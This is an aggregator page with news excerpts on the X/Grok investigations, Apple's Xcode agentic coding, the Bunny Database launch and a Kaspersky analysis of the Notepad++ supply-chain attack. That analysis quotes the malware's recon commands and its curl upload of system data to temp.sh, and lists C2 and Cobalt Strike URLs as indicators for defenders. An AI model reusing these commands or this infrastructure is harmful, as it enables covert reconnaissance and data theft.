X has also been un­der pres­sure from the EU. The 27-nation bloc’s ex­ec­u­tive arm opened an in­ves­ti­ga­tion last month af­ter Grok spewed non­con­sen­sual sex­u­al­ized deep­fake im­ages on the plat­form.

Brussels has al­ready hit X with a 120-million euro (then-$140 mil­lion) fine for short­com­ings un­der the bloc’s sweep­ing dig­i­tal reg­u­la­tions, in­clud­ing blue check­marks that broke the rules on deceptive de­sign prac­tices” that risked ex­pos­ing users to scams and ma­nip­u­la­tion.

On Monday, Musk s space ex­plo­ration and rocket busi­ness, SpaceX, an­nounced that it ac­quired xAI in a deal that will also com­bine Grok, X and his satel­lite com­mu­ni­ca­tion com­pany Starlink.

Associated Press writ­ers Nicolas Vaux-Montagny in Lyon, France, Mike Corder in The Hague, Netherlands, Sylvia Hui and Kelvin Chan in London con­tributed to this re­port.

...

Read the original on apnews.com »

7 281 shares, 18 trendiness

Xcode 26.3 unlocks the power of agentic coding

Developers can lever­age cod­ing agents, in­clud­ing Anthropic’s Claude Agent and OpenAI’s Codex, di­rectly in Xcode to tackle com­plex tasks au­tonomously, help­ing them de­velop apps faster than ever

Xcode 26.3 in­tro­duces sup­port for agen­tic cod­ing, a new way in Xcode for de­vel­op­ers to build apps us­ing cod­ing agents such as Anthropic’s Claude Agent and OpenAI’s Codex. With agen­tic cod­ing, Xcode can work with greater au­ton­omy to­ward a de­vel­op­er’s goals — from break­ing down tasks to mak­ing de­ci­sions based on the pro­ject ar­chi­tec­ture and us­ing built-in tools.

Expanding on the in­tel­li­gence fea­tures in­tro­duced in Xcode 26, which brought a brand-new cod­ing as­sis­tant for writ­ing and edit­ing in Swift, this re­lease gives cod­ing agents ac­cess to even more of Xcode’s ca­pa­bil­i­ties. Agents like Claude Agent and Codex can now col­lab­o­rate through­out the en­tire de­vel­op­ment life cy­cle, giv­ing de­vel­op­ers the power to stream­line work­flows, it­er­ate faster, and bring ideas to life like never be­fore. Agents can search doc­u­men­ta­tion, ex­plore file struc­tures, up­date pro­ject set­tings, and ver­ify their work vi­su­ally by cap­tur­ing Xcode Previews and it­er­at­ing through builds and fixes.

At Apple, our goal is to make tools that put in­dus­try-lead­ing tech­nolo­gies di­rectly in de­vel­op­ers’ hands so they can build the very best apps,” said Susan Prescott, Apple’s vice pres­i­dent of Worldwide Developer Relations. Agentic cod­ing su­per­charges pro­duc­tiv­ity and cre­ativ­ity, stream­lin­ing the de­vel­op­ment work­flow so de­vel­op­ers can fo­cus on in­no­va­tion.”

With seam­less ac­cess to Claude Agent and Codex, de­vel­op­ers can bring the ad­vanced rea­son­ing of these mod­els di­rectly into their app-build­ing work­flow.1 This con­nec­tion com­bines the power of these agents with Xcode’s na­tive ca­pa­bil­i­ties to pro­vide the best re­sults when de­vel­op­ing for Apple plat­forms, giv­ing de­vel­op­ers the flex­i­bil­ity to work with the model that best fits their pro­ject.

In ad­di­tion to these built-in in­te­gra­tions, Xcode 26.3 makes its ca­pa­bil­i­ties avail­able through the Model Context Protocol, an open stan­dard that gives de­vel­op­ers the flex­i­bil­ity to use any com­pat­i­ble agent or tool with Xcode.

Xcode 26.3 is avail­able as a re­lease can­di­date for all mem­bers of the Apple Developer Program start­ing to­day, with a re­lease com­ing soon on the App Store.

Anthropic and OpenAI’s terms of ser­vice may ap­ply.

...

Read the original on www.apple.com »

8 279 shares, 16 trendiness

X offices raided in France as UK opens fresh investigation into Grok

The re­ports about Grok raise deeply trou­bling ques­tions about how peo­ple’s per­sonal data has been used to gen­er­ate in­ti­mate or sex­u­alised im­ages with­out their knowl­edge or con­sent, and whether the nec­es­sary safe­guards were put in place to pre­vent this,” said William Malcolm, the ICOs ex­ec­u­tive di­rec­tor for reg­u­la­tory risk & in­no­va­tion.

...

Read the original on www.bbc.com »

9 270 shares, 15 trendiness

The SQLite-Compatible Edge DB

Meet Bunny Database: the SQL ser­vice that just works­Don’t want to babysit your app data­base on a VM but not will­ing to pay the DBaaS tax ei­ther? We’re build­ing a third way. Today, we’re launch­ing Bunny Database as a pub­lic pre­view: a SQLite-compatible man­aged ser­vice that spins down when idle, keeps la­tency low wher­ever your users are, and does­n’t cost a for­tune.So what’s the deal with data­base ser­vices in 2026?It’s be­come clear by now that the DBaaS plat­forms that gar­nered the love of so many devs are all go­ing up­mar­ket. Removing or dumb­ing down free tiers, charg­ing for un­used ca­pac­ity, charg­ing ex­tra for small fea­tures, or bundling them in higher tiers — you al­ready know the drill.Hard to blame any­one for grow­ing their busi­ness, but it does­n’t feel right when these ser­vices stop mak­ing sense for the very peo­ple who helped pop­u­lar­ize them in the first place.So where does that leave you?Like SQLite, but for the web­Not every pro­ject needs Postgres, and that’s okay. Sometimes you just want a sim­ple, re­li­able data­base that you can spin up quickly and build on, with­out wor­ry­ing it’ll hit your wal­let like an EC2.That’s what we built Bunny Database for.What you get:One-click de­ploy­ment: just name your data­base and go, no con­fig need­ed­Lan­guage-spe­cific tool­ing: SDKs for TS/JS, Go, Rust, and .NET help you han­dle the bor­ing bit­sLow la­tency any­where: repli­ca­tion re­gions let you serve reads close to your user­sWorks over HTTP: wire up any­thing you’d like­Data­base ed­i­tor: in­sert data or run queries on the spotAfford­able, pay-as-you-go pric­ing: only pay for what you use, but with­out the server­less taxGet the full tour in­clud­ing how to con­nect Bunny Database to your app in this quick demo from our DX Engineer, Jamie Barton:

Why care about data­base la­tency any­way?You prob­a­bly op­ti­mize the heck out of your fron­tend, APIs, and caching lay­ers, all for the sake of de­liv­er­ing an ex­pe­ri­ence that feels in­stant to your users. But when your data­base is far away from them, round-trip time starts to add no­tice­able la­tency.The usual fix is to in­tro­duce more caching lay­ers, de­nor­mal­ized reads, or other workarounds. That’s ob­vi­ously no fun.And when you think about it, devs end up do­ing this be­cause the pop­u­lar DBaaS plat­forms are usu­ally ei­ther lim­ited, com­plex, or too costly when it comes to multi-re­gion de­ploy­ments. So what looks like a caching prob­lem is ac­tu­ally a data lo­cal­ity is­sue.OK, but how bad can it re­ally be?To find out, we ran a read la­tency bench­mark and mea­sured p95 la­tency in Bunny Database.We picked a num­ber of re­gions across the world and com­pared round-trip time for client lo­ca­tions ever far­ther away from the data­base in:Turns out serv­ing reads close to clients re­duced la­tency by up to 99%.Check out the full write-up on the bench­mark setup and re­sults here.While this def­i­nitely mat­ters most to apps with global users, data lo­cal­ity does ap­ply to every­one. With Bunny Database, you don’t have to stick to ma­jor data cen­ter lo­ca­tions and com­pen­sate with caching workarounds any more. Instead, you get a lot of flex­i­bil­ity to set up re­gions in an in­tu­itive in­ter­face and it’s easy to switch things up as your re­quire­ments change.Au­to­matic re­gion se­lec­tion gives you one-click de­ploy­ment with min­i­mal la­tency. Bunny Database will se­lect re­gions for you based on your IP ad­dress (you can check and tweak the se­lec­tion in set­tings later).Sin­gle-re­gion de­ploy­ment lets you pick one of 41 re­gions avail­able world­wide (check the full list here).Man­ual re­gion se­lec­tion gives you cus­tom multi-re­gion setup, where you can freely pick re­gions that make the most sense for your au­di­ence.All of this lets you start wher­ever you’d like and add re­gions as needed, with­out re-ar­chi­tect­ing your app.Us­age-based pric­ing, but with­out the server­less taxIn the data­base world, ca­pac­ity-based pric­ing gives you some pre­dictabil­ity. But no one likes to pay for un­used ca­pac­ity, right?Server­less, on the other hand, is sup­posed to be cost-ef­fi­cient, yet can rack up bills quickly, es­pe­cially when the DBaaS charges sig­nif­i­cant markups on top of al­ready pricey com­pute.We don’t do hy­per­scalers, though, so we can charge a fair price for Bunny Database in a us­age-based model.When not get­ting re­quests, Bunny Database only in­curs stor­age costs. One pri­mary re­gion is charged con­tin­u­ously, while read repli­cas only add stor­age costs when serv­ing traf­fic (metered by the hour)Your us­age is charged con­tin­u­ously (pay-as-you-go) and in­voiced month­ly­Dur­ing the pub­lic pre­view phase, Bunny Database is free.Wait, what does SQLite-compatible” ac­tu­ally mean?Bunny Database would­n’t be pos­si­ble with­out lib­SQL, the open-source, open-con­tri­bu­tion fork of SQLite cre­ated by Turso.We run Bunny Database on our own fork of lib­SQL, which gives us the free­dom to in­te­grate it tightly with the bunny.net plat­form and han­dle the in­fra­struc­ture and or­ches­tra­tion needed to run it as a man­aged, multi-re­gion ser­vice.What does this mean for Bunny Database’s up­stream fea­ture par­ity with lib­SQL and SQLite, re­spec­tively?The short an­swer is that we don’t cur­rently promise au­to­matic or com­plete fea­ture par­ity with ei­ther up­stream lib­SQL or the lat­est SQLite re­leases.While lib­SQL aims to stay com­pat­i­ble with SQLite’s API and file for­mat, it does­n’t move in lock­step with up­stream SQLite. We would­n’t ex­pect oth­er­wise, es­pe­cially as Turso has shifted fo­cus from lib­SQL to­ward a long-term rewrite of SQLite in Rust.For Bunny Database, this means that com­pat­i­bil­ity to­day is de­fined by the lib­SQL ver­sion we’re built on, rather than by chas­ing every up­stream SQLite or lib­SQL change as it lands. We haven’t pulled in any up­stream changes yet, and we don’t cur­rently treat up­stream par­ity as an au­to­matic goal.That’s in­ten­tional. Our fo­cus so far has been on mak­ing Bunny Database re­li­able and easy to op­er­ate as a ser­vice. We think bring­ing in up­stream changes only makes sense when they clearly im­prove real-world use cases, not just to tick a par­ity check­box.If there are spe­cific lib­SQL fea­tures you’d like to see ex­posed in Bunny Database, or re­cent SQLite fea­tures you’d want us to pull in, we’d love to hear about it. Join our Discord to dis­cuss your use cases and help shape the roadmap!Speak­ing of the roadmap, we don’t stop cook­ing. Here’s what’s com­ing up next:There’s even more to come, but it’s too soon to spill the beans yet, es­pe­cially while we’re in pub­lic pre­view. We’d love to hear your feed­back, so we can shape what ships next to­gether.Bunny Database works stand­alone and fits right into your stack via the SDKs (or you can hook up any­thing us­ing the HTTP API). But it also plays nicely with Bunny Edge Scripting and Bunny Magic Containers.To con­nect your data­base to an Edge Script or a Magic Containers app, sim­ply go to the Access tab of the cho­sen data­base and click Generate Tokens to cre­ate new ac­cess cre­den­tials for it.Once they’re gen­er­ated, you’ll get two paths to choose from:Click Add Secrets to an Edge Script and se­lect the one you’d like to con­nect from the list. You’ll also need to im­port the lib­SQL TypeScript client and use the pro­vided code snip­pet to con­nect it to your data­base.Click Add Secrets to Magic Container App and se­lect the one you’d like to con­nect from the list. You’ll also need to con­nect to the data­base from your app us­ing one of the client li­braries or the HTTP API.After you com­plete the setup, the data­base URL and ac­cess to­ken will be avail­able as en­vi­ron­ment vari­ables in your script or app. Use them to con­nect to your data­base:

You can find more de­tailed, step-by-step in­te­gra­tion in­struc­tions in the docs:We can’t wait to see what you’ll build with Bunny Database and what you think of it. During the pub­lic pre­view phase, you get 50 data­bases per user ac­count, each capped at 1 GB, but we hope this should be more than enough for lots of fun pro­jects.Just sign in to the bunny.net dash­board to get started. Happy build­ing!

...

Read the original on bunny.net »

10 242 shares, 21 trendiness

The Notepad++ supply chain attack – unnoticed execution chains and new IoCs

On February 2, 2026, the de­vel­op­ers of Notepad++, a text ed­i­tor pop­u­lar among de­vel­op­ers, pub­lished a state­ment claim­ing that the up­date in­fra­struc­ture of Notepad++ has been com­pro­mised. According to the state­ment, this was due to a host­ing provider level in­ci­dent, which oc­curred from June to September 2025. However, at­tack­ers were able to re­tain ac­cess to in­ter­nal ser­vices un­til December 2025.

Having checked our teleme­try re­lated to this in­ci­dent, we have been amazed to find out how dif­fer­ent and unique were the ex­e­cu­tion chains used in this sup­ply chain at­tack. We iden­ti­fied that over the course of four months, from July to October 2025, at­tack­ers who have com­pro­mised Notepad++ have been con­stantly ro­tat­ing C2 server ad­dresses used for dis­trib­ut­ing ma­li­cious up­dates, the down­load­ers used for im­plant de­liv­ery, as well as the fi­nal pay­loads.

We ob­served three dif­fer­ent in­fec­tion chains over­all de­signed to at­tack about a dozen ma­chines, be­long­ing to:

* An IT ser­vice provider or­ga­ni­za­tion lo­cated in Vietnam.

Despite the va­ri­ety of pay­loads ob­served, Kaspersky so­lu­tions have been able to block the iden­ti­fied at­tacks as they oc­curred.

In this ar­ti­cle, we de­scribe the va­ri­ety of the in­fec­tion chains we ob­served in the Notepad++ sup­ply chain at­tack, as well as pro­vide nu­mer­ous pre­vi­ously un­pub­lished IoCs re­lated to it.

We ob­served at­tack­ers to de­ploy a ma­li­cious Notepad++ up­date for the first time in late July 2025. It was hosted at http://​45.76.155[.]202/​up­date/​up­date.exe. Notably, the first scan of this URL on the VirusTotal plat­form oc­curred in late September, by a user from Taiwan.

The up­date.exe file down­loaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was launched by the le­git­i­mate Notepad++ up­dater process, GUP.exe. This file turned out to be a NSIS in­staller, of about 1 MB in size. When started, it sends a heart­beat con­tain­ing sys­tem in­for­ma­tion to the at­tack­ers. This is done through the fol­low­ing steps:

The file cre­ates a di­rec­tory named %appdata%\ProShow and sets it as the cur­rent di­rec­tory;

It ex­e­cutes the shell com­mand cmd /c whoami&&tasklist > 1.txt, thus cre­at­ing a file with the shell com­mand ex­e­cu­tion re­sults in the %appdata%\ProShow di­rec­tory;

Then it up­loads the 1.txt file to the temp[.]sh host­ing ser­vice by ex­e­cut­ing the curl.exe -F file=@1.txt” -s https://​temp.sh/​up­load com­mand;

Next, it sends the URL to the up­loaded 1.txt file by us­ing the curl.exe –user-agent https://​temp.sh/​ZM­RKV/​1.txt -s http://​45.76.155[.]202 shell com­mand. As can be ob­served, the up­loaded file URL is trans­ferred in­side the user agent.

Notably, the same be­hav­ior of ma­li­cious Notepad++ up­dates, specif­i­cally the launch of shell com­mands and the use of the temp[.]sh web­site for file up­load­ing, has been de­scribed on the Notepad++ com­mu­nity fo­rums by a user named soft-pars­ley.

After send­ing sys­tem in­for­ma­tion, the up­date.exe file ex­e­cutes the sec­ond-stage pay­load. To do that, it per­forms the fol­low­ing ac­tions:

* Drops the fol­low­ing files to the %appdata%\ProShow di­rec­tory:

The launched ProShow.exe file is a le­git­i­mate ProShow soft­ware, which is abused to launch a ma­li­cious pay­load. Normally, when threat ac­tors aim to ex­e­cute a ma­li­cious pay­load in­side a le­git­i­mate process, they re­sort to the DLL side­load­ing tech­nique. However, this time at­tack­ers have de­cided to avoid us­ing it — likely due to how much at­ten­tion this tech­nique re­ceives nowa­days. Instead, they abused an old, known vul­ner­a­bil­ity in the ProShow soft­ware, which dates back to early 2010s. The dropped file named load con­tains an ex­ploit pay­load, which is launched when the ProShow.exe file is launched. It is worth not­ing that, apart from this pay­load, all files in the %appdata%\ProShow di­rec­tory are le­git­i­mate.

Analysis of the ex­ploit pay­load re­vealed that it con­tains two shell­codes — one at the very start and the other one in the mid­dle of the file. The shell­code lo­cated at the start of the file con­tains a set of mean­ing­less in­struc­tions and is not de­signed to be ex­e­cuted — rather, at­tack­ers used it as the ex­ploit padding bytes. It is likely that, by us­ing a fake shell­code for padding bytes in­stead of some­thing else (e.g., a se­quence of 0x41 char­ac­ters or ran­dom bytes), at­tack­ers aimed to con­fuse re­searchers and au­to­mated analy­sis sys­tems.

The sec­ond shell­code, which is stored in the mid­dle of the file, is the one that is launched when ProShow.exe is started. It de­crypts a Metasploit down­loader pay­load that re­trieves a Cobalt Strike Beacon shell­code from the URL https://​45.77.31[.]210/​users/​ad­min (user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36) and launches it.

The Cobalt Strike Beacon pay­load is de­signed to com­mu­ni­cate with the cd­ncheck.it[.]com C2 server. For in­stance, it uses the GET re­quest URL https://​45.77.31[.]210/​api/​up­date/​v1 and the POST re­quest URL https://​45.77.31[.]210/​api/​File­U­pload/​sub­mit.

Later on, in early August 2025, we have ob­served at­tack­ers to use the same down­load URL for the up­date.exe files (observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same ex­e­cu­tion chain for de­liv­ery of Cobalt Strike Beacon via ma­li­cious Notepad++ up­dates. However, we noted the fol­low­ing dif­fer­ences:

* In the Metasploit down­loader pay­load, the URL for down­load­ing Cobalt Strike Beacon was set to https://​cd­ncheck.it[.]com/​users/​ad­min;

* The Cobalt Strike C2 server URLs were set to https://​cd­ncheck.it[.]com/​api/​up­date/​v1 and https://​cd­ncheck.it[.]com/​api/​Meta­data/​sub­mit.

We have not fur­ther seen any in­fec­tions lever­ag­ing chain #1 af­ter early August 2025.

A month and a half af­ter ma­li­cious up­date de­tec­tions ceased, we ob­served at­tack­ers to re­sume de­ploy­ing these up­dates in the mid­dle of September 2025, us­ing an­other in­fec­tion chain. The ma­li­cious up­date was still be­ing dis­trib­uted from the http://​45.76.155[.]202/​up­date/​up­date.exe URL, and the file down­loaded from it (SHA1 hash: 573549869e84544e3ef253bdba79851dcde4963a) was an NSIS in­staller as well. However, its file size was now about 140 KB. Again, this file per­formed two ac­tions:

* Obtained sys­tem in­for­ma­tion by ex­e­cut­ing a shell com­mand and up­load­ing its ex­e­cu­tion re­sults to temp[.]sh;

* Dropped a next-stage pay­load on disk and launched it.

Regarding sys­tem in­for­ma­tion, at­tack­ers made the fol­low­ing changes to how it was col­lected:

* They changed the work­ing di­rec­tory to %APPDATA%\Adobe\Scripts;

* They started col­lect­ing more sys­tem in­for­ma­tion de­tails, chang­ing the ex­e­cuted shell com­mand to cmd /c whoami&&tasklist&&systeminfo&&netstat -ano” > a.txt.

The cre­ated a.txt file was, just as in the case of stage #1, up­loaded to the temp[.]sh web­site through curl, with the ob­tained temp[.]sh URL be­ing trans­ferred to the same http://​45.76.155[.]202/​list end­point, in­side the User-Agent header.

As for the next-stage pay­load, it has been changed com­pletely. The NSIS in­staller was con­fig­ured to drop the fol­low­ing files to the %APPDATA%\Adobe\Scripts di­rec­tory:

Next, it ex­e­cutes the fol­low­ing shell com­mand to launch the script.exe file: %APPDATA%\%Adobe\Scripts\script.exe %APPDATA%\Adobe\Scripts\alien.ini.

All of the files in the %APPDATA%\Adobe\Scripts di­rec­tory, ex­cept for alien.ini, are le­git­i­mate and re­lated to the Lua in­ter­preter. As such, the pre­vi­ously men­tioned com­mand is used by at­tack­ers to launch a com­piled Lua script, lo­cated in the alien.ini file. Below is a screen­shot of its de­com­pi­la­tion:

As we can see, this small script is used for plac­ing shell­code in­side ex­e­cutable mem­ory and then launch­ing it through the EnumWindowStationsW API func­tion.

The launched shell­code is, just in the case of chain #1, a Metasploit down­loader, which down­loads a Cobalt Strike Beacon pay­load, again in the form of a shell­code, from the https://​cd­ncheck.it[.]com/​users/​ad­min URL.

The Cobalt Strike pay­load con­tains the C2 server URLs that slightly dif­fer from the ones seen pre­vi­ously: https://​cd­ncheck.it[.]com/​api/​get­Info/​v1 and https://​cd­ncheck.it[.]com/​api/​File­U­pload/​sub­mit.

Attacks in­volv­ing chain #2 con­tin­ued un­til the end of September, when we ob­served two more ma­li­cious up­date.exe files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt Strike Beacon pay­load de­liv­ered through it was con­fig­ured to use the same URLs ob­served in mid-Sep­tem­ber, how­ever, at­tack­ers changed the way sys­tem in­for­ma­tion was col­lected. Specifically, at­tack­ers split the sin­gle shell com­mand they used for this (cmd /c whoami&&tasklist&&systeminfo&&netstat -ano” > a.txt) into mul­ti­ple com­mands:

Notably, the same se­quence of com­mands has been pre­vi­ously doc­u­mented by the soft-pars­ley user on the Notepad++ com­mu­nity fo­rums.

The other up­date.exe file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. Using it, at­tack­ers per­formed the fol­low­ing:

* Changed the user agent used in HTTP re­quests to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36;

* Changed the URL used by the Metasploit down­loader to https://​safe-dns.it[.]com/​help/​Get-Start;

* Changed the Cobalt Strike Beacon C2 server URLs to https://​safe-dns.it[.]com/​re­solve and https://​safe-dns.it[.]com/​dns-query.

In early October 2025, at­tack­ers changed the in­fec­tion chain once again. They have as well changed the C2 server for dis­trib­ut­ing ma­li­cious up­dates, with the ob­served up­date URL be­ing http://​45.32.144[.]255/​up­date/​up­date.exe. The pay­load down­loaded (SHA1: d7ffd7b588880cf61b603346a3557e7c­ce648c93) was still a NSIS in­staller, how­ever, un­like in the case of chains 1 and 2, this in­staller did not in­clude the sys­tem in­for­ma­tion send­ing func­tion­al­ity. It sim­ply dropped the fol­low­ing files to the %appdata%\Bluetooth\ di­rec­tory:

This ex­e­cu­tion chain re­lies on the side­load­ing of the log.dll file, which is re­spon­si­ble for launch­ing the en­crypted BluetoothService shell­code into the BluetoothService.exe process. Notably, such ex­e­cu­tion chains are com­monly used by Chinese-speaking threat ac­tors. This par­tic­u­lar ex­e­cu­tion chain has al­ready been de­scribed by Rapid7, and the fi­nal pay­load ob­served in it is the cus­tom Chrysalis back­door.

Unlike the pre­vi­ous chains, chain #3 does not load a Cobalt Strike Beacon di­rectly. However, in their ar­ti­cle Rapid7 claim that they ad­di­tion­ally ob­served a Cobalt Strike Beacon pay­load be­ing de­ployed to the C:\ProgramData\USOShared folder, while con­duct­ing in­ci­dent re­sponse on one of the ma­chines in­fected with the Notepad++ sup­ply chain at­tack. Whilst Rapid7 does not de­tail how this file was dropped to the vic­tim ma­chine, we can high­light the fol­low­ing sim­i­lar­i­ties be­tween that Beacon pay­load and the Beacon pay­loads ob­served in chains #1 and #2:

In both cases, Beacons are loaded through a Metasploit down­loader shell­code, with sim­i­lar URLs used (api.wires­guard.com/​users/​ad­min for the Rapid7 pay­load, cd­ncheck.it.com/​users/​ad­min and http://​45.77.31[.]210/​users/​ad­min for chain #1 and chain #2 pay­loads);

The Beacon con­fig­u­ra­tions are en­crypted with the XOR key CRAZY;

Similar C2 server URLs are used for Cobalt Strike Beacon com­mu­ni­ca­tions (i.e. api.wires­guard.com/​api/​File­U­pload/​sub­mit for the Rapid7 pay­load and https://​45.77.31[.]210/​api/​File­U­pload/​sub­mit for the chain #1 pay­load).

In mid-Oc­to­ber 2025, we ob­served at­tack­ers to re­sume de­ploy­ments of the chain #2 pay­load (SHA1 hash: 821c0cafb2aab0f063ef7e313f64313fc81d46cd) us­ing yet an­other URL: http://​95.179.213[.]0/​up­date/​up­date.exe. Still, this pay­load used the pre­vi­ously men­tioned self-dns.it[.]com and safe-dns.it[.]com do­main names for sys­tem in­for­ma­tion up­load­ing, Metasploit down­loader and Cobalt Strike Beacon com­mu­ni­ca­tions.

Further in late October 2025, we ob­served at­tack­ers to start chang­ing URLs used for ma­li­cious up­date de­liv­er­ies. Specifically, at­tack­ers started us­ing the fol­low­ing URLs:

We haven’t ob­served any new pay­loads de­ployed from these URLs — they in­volved us­age of both #2 and #3 ex­e­cu­tion chains. Finally, we have not seen any pay­loads be­ing de­ployed start­ing from November 2025.

Notepad++ is a text ed­i­tor used by nu­mer­ous de­vel­op­ers. As such, the abil­ity to con­trol up­date servers of this soft­ware gave at­tack­ers a unique pos­si­bil­ity to break into ma­chines of high-pro­file or­ga­ni­za­tions around the world. The at­tack­ers made an ef­fort to avoid los­ing ac­cess to this in­fec­tion vec­tor — they were spread­ing the ma­li­cious im­plants in a tar­geted man­ner, and they were skilled enough to dras­ti­cally change the in­fec­tion chains about once a month. Whilst we iden­ti­fied three dis­tinct in­fec­tion chains dur­ing our in­ves­ti­ga­tion, we would not be sur­prised to see more of them in use. To sum up our find­ings, here is the over­all time­line of the in­fec­tion chains that we iden­ti­fied:

The va­ri­ety of in­fec­tion chains makes de­tec­tion of the Notepad++ sup­ply chain at­tack quite a dif­fi­cult and at the same time cre­ative task. We would like to pro­pose the fol­low­ing meth­ods, from generic to spe­cific, to hunt down traces of this at­tack:

* Check sys­tems for de­ploy­ments of NSIS in­stallers, which have been used in all three ob­served ex­e­cu­tion chains. For ex­am­ple, this can be done by look­ing for logs re­lated to cre­ations of the %localappdata%\Temp\ns.tmp di­rec­tory, made by NSIS in­stallers at run­time. Make sure to in­ves­ti­gate the ori­gins of each iden­ti­fied NSIS in­staller to avoid false pos­i­tives;

* Check net­work traf­fic logs for DNS res­o­lu­tions of the temp[.]sh do­main, which is un­usual to ob­serve in cor­po­rate en­vi­ron­ments. Also, it is ben­e­fi­cial to con­duct a check for raw HTTP traf­fic re­quests that have a temp[.]sh URL em­bed­ded in the user agent — both these steps will make it pos­si­ble to de­tect chain #1 and chain #2 de­ploy­ments;

* Check sys­tems for launches of ma­li­cious shell com­mands ref­er­enced in the ar­ti­cle, such as whoami, tasklist, sys­tem­info and net­stat -ano;

* Use spe­cific IoCs listed be­low to iden­tify known ma­li­cious do­mains and files.

URLs used by Metasploit down­load­ers to de­ploy Cobalt Strike bea­cons

https://​45.77.31[.]210/​users/​ad­min

https://​cd­ncheck.it[.]com/​users/​ad­min

https://​safe-dns.it[.]com/​help/​Get-Start

URLs used by Cobalt Strike Beacons de­liv­ered by ma­li­cious Notepad++ up­daters

https://​45.77.31[.]210/​api/​up­date/​v1

https://​45.77.31[.]210/​api/​File­U­pload/​sub­mit

https://​cd­ncheck.it[.]com/​api/​up­date/​v1

https://​cd­ncheck.it[.]com/​api/​Meta­data/​sub­mit

https://​cd­ncheck.it[.]com/​api/​get­Info/​v1

https://​cd­ncheck.it[.]com/​api/​File­U­pload/​sub­mit

https://​safe-dns.it[.]com/​re­solve

https://​safe-dns.it[.]com/​dns-query

URLs used by the Chrysalis back­door and the Cobalt Strike Beacon pay­loads as­so­ci­ated with it, as pre­vi­ously iden­ti­fied by Rapid7

https://​api.sky­cloud­cen­ter[.]com/​a/​chat/​s/​70521ddf-a2ef-4adf-9cf0-6d8e24aaa821

https://​api.wires­guard[.]com/​up­date/​v1

https://​api.wires­guard[.]com/​api/​File­U­pload/​sub­mit

URLs re­lated to Cobalt Strike Beacons up­loaded to mul­ti­scan­ners, as pre­vi­ously iden­ti­fied by Rapid7

http://​59.110.7[.]32:8880/​uffhx­pSy

http://​59.110.7[.]32:8880/​api/​get­Ba­sicInfo/​v1

http://​59.110.7[.]32:8880/​api/​Meta­data/​sub­mit

http://​124.222.137[.]114:9999/​3yZR31VK

http://​124.222.137[.]114:9999/​api/​up­dat­eS­ta­tus/​v1

http://​124.222.137[.]114:9999/​api/​Info/​sub­mit

https://​api.wires­guard[.]com/​users/​sys­tem

https://​api.wires­guard[.]com/​api/​get­Info/​v1

...

Read the original on securelist.com »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.